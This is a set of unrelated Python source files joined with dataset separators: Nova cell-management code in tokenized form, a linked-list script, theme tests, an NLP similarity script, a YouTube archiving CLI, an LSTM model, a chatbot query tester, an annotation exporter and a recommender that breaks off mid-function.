name|'admin_state_reset'
op|')'
newline|'\n'
nl|'\n'
DECL|member|start_instance
dedent|''
name|'def'
name|'start_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Start an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'start_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|stop_instance
dedent|''
name|'def'
name|'stop_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'do_cast'
op|'='
name|'True'
op|','
nl|'\n'
name|'clean_shutdown'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Stop an instance in its cell."""'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'stop_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'do_cast'
op|'='
name|'do_cast'
op|','
nl|'\n'
name|'clean_shutdown'
op|'='
name|'clean_shutdown'
op|')'
newline|'\n'
name|'if'
name|'not'
name|'do_cast'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|cell_create
dedent|''
dedent|''
name|'def'
name|'cell_create'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'values'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'cell_create'
op|'('
name|'ctxt'
op|','
name|'values'
op|')'
newline|'\n'
nl|'\n'
DECL|member|cell_update
dedent|''
name|'def'
name|'cell_update'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'values'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'cell_update'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'values'
op|')'
newline|'\n'
nl|'\n'
DECL|member|cell_delete
dedent|''
name|'def'
name|'cell_delete'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'cell_delete'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|cell_get
dedent|''
name|'def'
name|'cell_get'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'cell_get'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|reboot_instance
dedent|''
name|'def'
name|'reboot_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'reboot_type'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Reboot an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'reboot_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'reboot_type'
op|')'
newline|'\n'
nl|'\n'
DECL|member|pause_instance
dedent|''
name|'def'
name|'pause_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Pause an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'pause_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|unpause_instance
dedent|''
name|'def'
name|'unpause_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Unpause an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'unpause_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|suspend_instance
dedent|''
name|'def'
name|'suspend_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Suspend an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'suspend_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|resume_instance
dedent|''
name|'def'
name|'resume_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Resume an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'resume_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|terminate_instance
dedent|''
name|'def'
name|'terminate_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'delete_type'
op|'='
string|"'delete'"
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Delete an instance in its cell."""'
newline|'\n'
comment|'# NOTE(rajesht): The `delete_type` parameter is passed so that it will'
nl|'\n'
comment|'# be routed to destination cell, where instance deletion will happen.'
nl|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'terminate_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'delete_type'
op|'='
name|'delete_type'
op|')'
newline|'\n'
nl|'\n'
DECL|member|soft_delete_instance
dedent|''
name|'def'
name|'soft_delete_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Soft-delete an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'soft_delete_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|resize_instance
dedent|''
name|'def'
name|'resize_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'flavor'
op|','
nl|'\n'
name|'extra_instance_updates'
op|','
nl|'\n'
name|'clean_shutdown'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Resize an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'resize_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'flavor'
op|','
name|'extra_instance_updates'
op|','
nl|'\n'
name|'clean_shutdown'
op|'='
name|'clean_shutdown'
op|')'
newline|'\n'
nl|'\n'
DECL|member|live_migrate_instance
dedent|''
name|'def'
name|'live_migrate_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'block_migration'
op|','
nl|'\n'
name|'disk_over_commit'
op|','
name|'host_name'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Live migrate an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'live_migrate_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'block_migration'
op|','
nl|'\n'
name|'disk_over_commit'
op|','
nl|'\n'
name|'host_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|revert_resize
dedent|''
name|'def'
name|'revert_resize'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Revert a resize for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'revert_resize'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|confirm_resize
dedent|''
name|'def'
name|'confirm_resize'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Confirm a resize for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'confirm_resize'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|reset_network
dedent|''
name|'def'
name|'reset_network'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Reset networking for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'reset_network'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|inject_network_info
dedent|''
name|'def'
name|'inject_network_info'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Inject networking for an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'inject_network_info'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|snapshot_instance
dedent|''
name|'def'
name|'snapshot_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Snapshot an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'snapshot_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
DECL|member|backup_instance
dedent|''
name|'def'
name|'backup_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|','
name|'backup_type'
op|','
name|'rotation'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Backup an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'backup_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_id'
op|','
nl|'\n'
name|'backup_type'
op|','
name|'rotation'
op|')'
newline|'\n'
nl|'\n'
DECL|member|rebuild_instance
dedent|''
name|'def'
name|'rebuild_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_href'
op|','
name|'admin_password'
op|','
nl|'\n'
name|'files_to_inject'
op|','
name|'preserve_ephemeral'
op|','
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'rebuild_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'image_href'
op|','
nl|'\n'
name|'admin_password'
op|','
name|'files_to_inject'
op|','
nl|'\n'
name|'preserve_ephemeral'
op|','
name|'kwargs'
op|')'
newline|'\n'
nl|'\n'
DECL|member|set_admin_password
dedent|''
name|'def'
name|'set_admin_password'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'new_pass'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'set_admin_password'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
name|'new_pass'
op|')'
newline|'\n'
nl|'\n'
DECL|member|get_keypair_at_top
dedent|''
name|'def'
name|'get_keypair_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'user_id'
op|','
name|'name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'responses'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'get_keypair_at_top'
op|'('
name|'ctxt'
op|','
name|'user_id'
op|','
name|'name'
op|')'
newline|'\n'
name|'keypairs'
op|'='
op|'['
name|'resp'
op|'.'
name|'value'
name|'for'
name|'resp'
name|'in'
name|'responses'
name|'if'
name|'resp'
op|'.'
name|'value'
name|'is'
name|'not'
name|'None'
op|']'
newline|'\n'
nl|'\n'
name|'if'
name|'len'
op|'('
name|'keypairs'
op|')'
op|'=='
number|'0'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'None'
newline|'\n'
dedent|''
name|'elif'
name|'len'
op|'('
name|'keypairs'
op|')'
op|'>'
number|'1'
op|':'
newline|'\n'
indent|' '
name|'cell_names'
op|'='
string|"', '"
op|'.'
name|'join'
op|'('
op|'['
name|'resp'
op|'.'
name|'cell_name'
name|'for'
name|'resp'
name|'in'
name|'responses'
nl|'\n'
name|'if'
name|'resp'
op|'.'
name|'value'
name|'is'
name|'not'
name|'None'
op|']'
op|')'
newline|'\n'
name|'LOG'
op|'.'
name|'warning'
op|'('
name|'_LW'
op|'('
string|'"The same keypair name \'%(name)s\' exists in the "'
nl|'\n'
string|'"following cells: %(cell_names)s. The keypair "'
nl|'\n'
string|'"value from the first cell is returned."'
op|')'
op|','
nl|'\n'
op|'{'
string|"'name'"
op|':'
name|'name'
op|','
string|"'cell_names'"
op|':'
name|'cell_names'
op|'}'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'keypairs'
op|'['
number|'0'
op|']'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| StarcoderdataPython |
183923 | class Node:
def __init__(self, data) -> None:
self.data = data
self.right = self.down = None
class LinkedList:
def __init__(self) -> None:
self.head = self.rear = None
def insert(self, item, location):
temp = Node(item)
if self.rear == None:
self.head = self.rear = temp
return
if 'right' in location.lower():
self.rear.right = temp
self.rear = temp
return
if 'down' in location.lower():
temp.down = self.rear.down
self.rear.down = temp
return
def sortedMerge(a, b):
result = None
if a == None:
return b
if b == None:
return a
if a.data <= b.data:
result = a
result.down = sortedMerge(a.down, b)
else:
result = b
result.down = sortedMerge(a, b.down)
result.right = None
return result
def flatter(node):
if node == None or node.right == None:
return node
return sortedMerge(node, flatter(node.right))
def display(Node):
temp = Node.head
while temp:
print(temp.data, end=' ==> ')
temp_down = temp.down
while temp_down:
print(temp_down.data, end=' ---> ')
temp_down = temp_down.down
temp = temp.right
linked_list = LinkedList()
linked_list.insert(5, 'right')
linked_list.insert(30, 'down')
linked_list.insert(8, 'down')
linked_list.insert(7, 'down')
linked_list.insert(10, 'right')
linked_list.insert(20, 'down')
linked_list.insert(19, 'right')
linked_list.insert(50, 'down')
linked_list.insert(22, 'down')
linked_list.insert(28, 'right')
linked_list.insert(45, 'down')
linked_list.insert(40, 'down')
linked_list.insert(35, 'down')
display(linked_list)
print()
flatter(linked_list.head)
display(linked_list)
print() | StarcoderdataPython |
1709001 | <filename>tests/test_theme.py
from typing import Any, Dict
import pytest
from grgr.ggplot2.theme import Theme, ThemeElement
@pytest.mark.parametrize("kwargs, answer", [
({
"foo": '"bar"'
}, 'test(foo="bar")'),
({
"foo_bar": '"bar"'
}, 'test(foo.bar="bar")'),
({
"foo": '"bar"',
"foo_bar": '"bar"'
}, 'test(foo="bar",foo.bar="bar")'),
({}, "test()"),
])
def test_theme(kwargs: Dict[str, Any], answer: str):
assert Theme("test", **kwargs).tor() == answer
@pytest.mark.parametrize("kwargs, answer", [
({
"foo": '"bar"'
}, 'test(foo="bar")'),
({
"foo_bar": '"bar"'
}, 'test(foo_bar="bar")'),
({
"foo": '"bar"',
"foo_bar": '"bar"'
}, 'test(foo="bar",foo_bar="bar")'),
({}, "test()"),
])
def test_theme_element(kwargs: Dict[str, Any], answer: str):
assert ThemeElement("test", **kwargs).tor() == answer
| StarcoderdataPython |
1671800 | <filename>main.py
from openie import StanfordOpenIE
import os
import sys
import spacy
import neuralcoref
import stanza
from nltk.parse import stanford
from nltk.parse.stanford import StanfordParser
from nltk.tree import ParentedTree, Tree
from numpy import *
import warnings
warnings.filterwarnings('ignore')
java_path = "C:/Program Files/Java/jdk-11.0.11/bin/java.exe"
os.environ['JAVAHOME'] = java_path
os.environ['STANFORD_PARSER'] = './model/stanford-parser.jar'
os.environ['STANFORD_MODELS'] = './model/stanford-parser-4.2.0-models.jar'
def sentence_split(str_centence):
list_ret = list()
for s_str in str_centence.split('.'):
if '?' in s_str:
list_ret.extend(s_str.split('?'))
elif '!' in s_str:
list_ret.extend(s_str.split('!'))
else:
if s_str != "":
list_ret.append(s_str)
return list_ret
def search(dic,start):
queue=[]
queue.append(start)
bfsflag=set()
bfsflag.add(start)
while queue:
v=queue.pop(0)
bfsflag.add(v)
for item in dic[v]:
if (not (item in bfsflag))& (not (item in queue)) :
queue.append(item)
return list(bfsflag)
def bfs(dic):
max=0
for key in dic:
v=search(dic,key)
if (len(v)>max):
max=len(v)
return (max)
if __name__ =="__main__":
parser = StanfordParser()
corenlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos,lemma,depparse')
nlp = spacy.load('en_core_web_lg')
neuralcoref.add_to_pipe(nlp)
# with StanfordOpenIE() as client:
path=sys.argv[1]
files= os.listdir(path)
list1 = []
rate=[]
for file in files:
if not os.path.isdir(file):
f = open(path+"/"+file,'r',encoding='utf-8')
content=f.read()
content=content.replace('\n', '').replace('\r', '')
doc = nlp(content)
content_cor= doc._.coref_resolved
documents= nlp(content_cor)
rel={}
words=set()
for sentence in list(documents.sents):
wordinsent=set()
wordvecinset=set()
for word in sentence:
# print(word)
if str(word.tag_) in ['NN','NNS','NNP','NNPS','WP']:
# print(word, word.tag_)
wordinsent.add(word.text)
# wordvecinset.add(word)
words.add(word)
se1=list(wordinsent)
for w in se1:
if not(w in rel):
rel[w]=wordinsent
elif w in rel:
rel[w]=rel[w]|wordinsent
for wd1 in words:
for wd2 in words:
if (wd1.text!=wd2.text) & (wd1.similarity(wd2)>=0.8):
# print(wd1.text+" "+wd2.text)
rel[wd1.text].add(wd2.text)
rel[wd2.text].add(wd1.text)
rate.append((bfs(rel)/len(rel)))
print("Avg:"+str(mean(rate)))
| StarcoderdataPython |
1602173 | """
Download Youtube Watch Later playlist to a local directory, eternalize it,
then remove playlist.
Usage:
yt-download-watch-later [options]
Options:
-h, --help Display this message.
--version Show version information.
"""
VERSION = 1.0
import subprocess
import shutil
import glob
import sys, os
import docopt
from ..config.youtube_pipeline import YoutubePipelineConfigFile
NETWORK_RESOURCE = 'network'
STORAGE_RESOURCE = 'storage'
def main():
arguments = docopt.docopt(__doc__, version=VERSION)
coordinate = shutil.which('coordinate')
eternalize = shutil.which('eternalize')
yt_remove_watchlater = shutil.which('yt-remove-watchlater')
yt_dl = shutil.which('youtube-dl')
if not all([coordinate, eternalize, yt_remove_watchlater, yt_dl]):
print([coordinate, eternalize, yt_remove_watchlater, yt_dl])
raise RuntimeError("Not all tools were found.")
conf = YoutubePipelineConfigFile()
olddir = os.getcwd()
os.chdir(conf.download_path)
print("Downloading Watch Later...")
# download Watch Later
subprocess.check_call([
coordinate, NETWORK_RESOURCE, '--',
yt_dl, '--cookies', conf.cookies, 'https://www.youtube.com/playlist?list=WL'
])
# check if there are any files
files = glob.glob('*')
no_files = len(files)
if no_files == 0:
print("No new videos downloaded.")
return
elif no_files == 1:
print("Eternalizing...")
else:
print("Eternalizing {} files...".format(no_files))
# eternalize files
subprocess.check_call([
coordinate, STORAGE_RESOURCE, '--',
eternalize,
] + files + [conf.eternalize_target])
print("Removing watch later items...")
# remove watchlater
subprocess.check_call([
yt_remove_watchlater
])
os.chdir(olddir)
| StarcoderdataPython |
182620 | <reponame>andrew-miao/ECE657A_Project-text-classification
import torch
import torch.nn as nn
import torch.nn.functional as F
from LSTM_Attn_GRU.config_LSTMAttnGRU import Config
class LSTMAttnGRU(nn.Module):
def __init__(self, output_size):
super(LSTMAttnGRU, self).__init__()
self.lstm = nn.LSTM(Config.embedding_size, Config.hidden_size, batch_first=True, num_layers=Config.n_layers)
self.fc1 = nn.Linear(Config.embedding_size, Config.fc1_size)
self.fc2 = nn.Linear(Config.fc1_size, Config.fc2_size)
self.fc3 = nn.Linear(Config.gru_hidden_size, Config.fc3_size)
self.fc4 = nn.Linear(Config.fc3_size, output_size)
self.sigmoid = nn.Sigmoid()
self.gru = nn.GRU(Config.embedding_size, Config.gru_hidden_size, batch_first=True)
self.dropout = nn.Dropout()
self.logsoftmax = nn.LogSoftmax(dim=1)
self.softmax = nn.Softmax(dim=2)
def attention(self, x, lstm_out,):
x_compress = self.fc1(x)
attn_weight = self.softmax(self.fc2(x_compress))
attn_out = torch.bmm(attn_weight, lstm_out)
cat_out = torch.cat([x_compress, attn_out], dim=2)
return cat_out
def forward(self, x):
lstm_out, _ = self.lstm(x)
cat_out = self.attention(x, lstm_out)
gru_out, _ = self.gru(cat_out)
gru_out = gru_out[:, 0, :]
output = self.dropout(self.fc3(gru_out))
output = F.relu(self.fc4(output))
output = self.logsoftmax(output)
return output | StarcoderdataPython |
3258288 | <filename>JPS_Chatbot/UI/source/test/fill_the_cache.py
# in one hour, after one c
#
import time
import urllib
import urllib.parse
import urllib.request
import re
from datetime import datetime
import random
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
def fire_query_to_chatbot(question):
# x = input()
values = {'question': question}
tail = (urllib.parse.urlencode(values))
url = "http://127.0.0.1:5000/chemistry_chatbot/query?type=worldavatar&question=" + tail
#http://127.0.0.1:5000/chemistry_chatbot/query?type=wolfram&question=%C2%A0%20show%20me%20the%20vibration%20frequency%20of%20H2O2
r = urllib.request.urlopen(url)
return r
# def make_request(question):
# url = "http://127.0.0.1:5000/query?question=" + question
# options = Options()
# options.add_argument('--headless')
# driver = webdriver.Firefox(options=self.options)
# driver.get(url)
# html_source = self.driver.find_element_by_tag_name('html').get_attribute('innerHTML')
# self.driver.quit()
# html = BeautifulSoup(html_source, 'html.parser')
# return html
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print("Current Time =", current_time)
with open('test_log', 'w') as f:
f.write('test begins at' + current_time + '\n')
f.close()
with open('error_log', 'w') as f:
f.write('test begins at' + current_time + '\n')
f.close()
with open('page_questions') as f:
page_questions = [q.replace('\n', '') for q in f.readlines()]
# print(page_questions)
print('number of questions in total', len(page_questions))
with open('verified_questions', 'w') as f:
f.write(' ')
f.close()
verified_questions = []
counter = 0
good_counter = 0
with open('page_questions') as f:
counter = counter + 1
print('we are at number ', counter)
page_questions = [q.replace('\n', '') for q in f.readlines()]
# for q in random.choices(page_questions, k= 10):
for q in page_questions:
# print(q)
print('the question is', q)
r = fire_query_to_chatbot(q)
content = r.read().decode('utf-8')
# print('content:\n', content)
flag = 'Nothing' in content
if flag:
print('failure')
with open('error_log', 'a') as f:
f.write(q)
f.write('\n ------------ \n')
f.close()
else:
good_counter = good_counter + 1
print('good counter', good_counter)
verified_questions.append(q)
with open('verified_questions', 'a') as f:
f.write(q)
f.write('\n')
f.close()
with open('test_log', 'a') as f:
f.write('question:\n' + q)
f.write('\nresult:\n' + content)
f.write('\n ------------ \n')
f.close()
print('flag', flag)
print('---------------')
time.sleep(1)
# http://127.0.0.1:5000/query_wolfram?question=%C2%A0%20mass%20of%20aromatic%20hydrocarbons | StarcoderdataPython |
79291 | <filename>{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/settings.py<gh_stars>0
"""
Global settings for project.
May be just some literals, or path-related values.
{%- if cookiecutter.use_environment_based_settings %}
All environment-based settings should be declared here too.
{%- endif %}
"""
import pathlib
{%- if cookiecutter.use_environment_based_settings %}
from dotenv import load_dotenv # type: ignore
from environs import Env
load_dotenv()
env = Env()
env.read_env()
{%- endif %}
BASE_DIR = pathlib.Path(__file__).resolve().parent
| StarcoderdataPython |
119714 | <filename>explicates/exporter.py
# -*- coding: utf8 -*-
"""Exporter module."""
import json
import string
import tempfile
import zipfile
import unidecode
from flask import current_app
from sqlalchemy import and_
from werkzeug.utils import secure_filename
from werkzeug.datastructures import FileStorage
from explicates.core import repo, db
from explicates.model.annotation import Annotation
from explicates.model.collection import Collection
class Exporter(object):
def _stream_annotation_data(self, collection):
"""Stream the contents of an AnnotationCollection from the database."""
table = Annotation.__table__
where_clauses = [
table.c.collection_key == collection.key,
table.c.deleted is not True
]
query = table.select().where(and_(*where_clauses))
exec_opts = dict(stream_results=True)
res = db.session.connection(execution_options=exec_opts).execute(query)
while True:
chunk = res.fetchmany(10000)
if not chunk:
break
for row in chunk:
yield dict(row)
def generate_data(self, collection_id):
"""Return all Annotations as JSON-LD."""
collection = repo.get_by(Collection, id=collection_id)
data_gen = self._stream_annotation_data(collection)
first = True
yield '['
for row in data_gen:
anno = Annotation(**dict(row))
anno.collection = collection
anno_dict = anno.dictize()
out = json.dumps(anno_dict)
yield out if first else ', ' + out
first = False
yield ']'
| StarcoderdataPython |
4816211 |
import logging
import webapp2
import json
import logic
from models import Rating, PFuser, ClusterRating, Place, Discount
from google.appengine.api import memcache, taskqueue
from datetime import datetime
def put_user_in_cluster(user):
ratings = Rating.get_list({'user': user.key.id()})
rlist = {}
for rating in ratings:
if rating.not_known is False and rating.value > 0:
place = rating.place.urlsafe()
rlist['%s-%s' % (place, rating.purpose)] = rating.value
ruser = {'ratings': rlist}
centroids = {}
cratings = ClusterRating.get_list({})
for rating in cratings:
if rating.cluster_id not in centroids:
centroids[rating.cluster_id] = {'key': rating.cluster_id, 'ratings': {}}
if rating.avg_value > 0:
place = rating.place.urlsafe()
centroids[rating.cluster_id]['ratings']['%s-%s' % (place, rating.purpose)] = rating.avg_value
max_sim = 0
cluster_id = None
for clid in centroids:
sim = logic.similarity(ruser, centroids[clid])
if sim >= max_sim:
max_sim = sim
cluster_id = clid
user.cluster_id = cluster_id
user.put()
return cluster_id
from math import radians, cos, sin, asin, sqrt
def distance(lat1, lon1, lat2, lon2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees), using the haversine formula
Returns distance in meters
"""
# logging.info('recommender.distance START : lat1=' + str(lat1) +
# " - lon1=" + str(lon1) + " - lat2=" + str(lat2) + " - lon2=" + str(lon2))
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2
c = 2 * asin(sqrt(a))
meters = 6367000 * c
# logging.info('recommender.distance END - ' + str(meters))
return meters
def load_data(filters):
"""
It loads data from datastore.
Filters:
- users: array of user ids (the users within user cluster)
- places: array of palce ids (the places that satisfy user's location parameters)
- purpose: the purpose we are interested in
if filters is None, it loads all ratings in the datastore
"""
# logging.info('recommender.load_data START - filters=' + str(filters))
ratings, status, errcode = logic.rating_list_get(filters)
if status != "OK":
logging.error(str(errcode) + ": " + status)
return None
# map: user - place - purpose --> value
data = {}
for rating in ratings:
if rating.not_known is False and rating.value > 0:
user = rating.user.id()
place = rating.place.urlsafe()
if user not in data:
data[user] = {}
if place not in data[user]:
data[user][place] = {}
data[user][place][rating.purpose] = rating.value
# logging.info('recommender.load_data END - data users: ' +
# str(len(data)) + ' -- ratings: ' + str(len(ratings)))
return data
def cluster_based(user_id, places, purpose='dinner with tourists', np=5, loc_filters = None):
"""
It computes cluster-based recommendations.
Clusters have been already computed, so only user's cluster information is needed to compute predictions for the user.
Input:
- user: the id of the requester
- places: the list of places that can be recommended
- purpose: the purpose the user is interested in
- np: the number of recommendations the user needs
Result:
- list of np tuples (score, place_key), where score is the predicted rating for the user and place_key is the key of the palce to which it refers to
- None if the clusters cannot be computed (no ratings in the system)
"""
logging.info('kmeans.cluster_based START - user=' +
str(user_id) + ', places: '+str(len(places))+', purpose:' + str(purpose) + ', np=' + str(np))
client = memcache.Client()
purpose_str = purpose.replace(' ', '-')
rec_name = 'cluster-scores_' + str(user_id) + '_' + purpose_str
# memcache_scores is a dict containing:
# - scores: list of items and scores
# - purpose
# - lat
# - lon
# - max_dist
memcache_scores = client.get(rec_name)
logging.info("CLUSTER SCORES from memcache: " + str(memcache_scores) + ' -- ' + str(loc_filters))
memcache_valid = False
if memcache_scores is not None and 'purpose' in memcache_scores and memcache_scores['purpose'] == purpose:
if loc_filters is not None and 'lat' in loc_filters:
if 'lat' in memcache_scores and 'lon' in memcache_scores and 'max_dist' in memcache_scores:
diff_lat = memcache_scores['lat'] - loc_filters['lat']
diff_lon = memcache_scores['lon'] - loc_filters['lon']
if diff_lat < 0.0002 and diff_lat > -0.0002 and diff_lon < 0.0002 and diff_lon > -0.0002 and memcache_scores['max_dist'] >= loc_filters['max_dist']:
memcache_valid = True
# else:
# memcache_valid = True
if memcache_valid:
logging.info("CLUSTER SCORES loaded from memcache")
scores = memcache_scores['scores']
scores = sorted(scores, key=lambda x: x[0], reverse = True)
else:
user = PFuser.get_by_key(PFuser.make_key(user_id, None))
if user.cluster_id is None or len(user.cluster_id) < 1:
user.cluster_id = put_user_in_cluster(user)
if user.cluster_id is None or len(user.cluster_id) < 1:
logging.error("The system is not able to put the user in a cluster!")
return None
logging.info("USER %s is in cluster %s" % (user_id, user.cluster_id))
filters = {'cluster_id': user.cluster_id, 'purpose': purpose}
if places is not None:
filters['places'] = places
avg_ratings = ClusterRating.get_list(filters)
logging.info("Loaded cluster ratings: " + str(len(avg_ratings)))
del filters['cluster_id']
filters['user'] = user_id
user_ratings = Rating.get_list(filters)
logging.info("Loaded user ratings: " + str(len(user_ratings)))
scores = []
for cr in avg_ratings:
for ur in user_ratings:
if cr.avg_value < 3.0:
#skip this place, too low rating
continue
if cr.place == ur.place and ur.value <3.0:
#skip this place, user doesn't like it
continue
already_stored = False
prev_value = None
cr_key = cr.place.urlsafe()
for value, key in scores:
if key == cr_key:
already_stored = True
prev_value = value
if already_stored:
if value > prev_value:
logging.info("Found same place with two different values!! (%s, %d, %d)" + (cr_key, prev_value, cr.avg_value))
scores.delete((prev_value, cr_key))
scores.append((cr.avg_value, cr_key))
continue
scores.append((cr.avg_value, cr_key))
scores = sorted(scores, key=lambda x: x[0], reverse = True)
logging.info("Scores: " + str(len(scores)))
#save scores in memcache
purpose_str = purpose.replace(' ', '-')
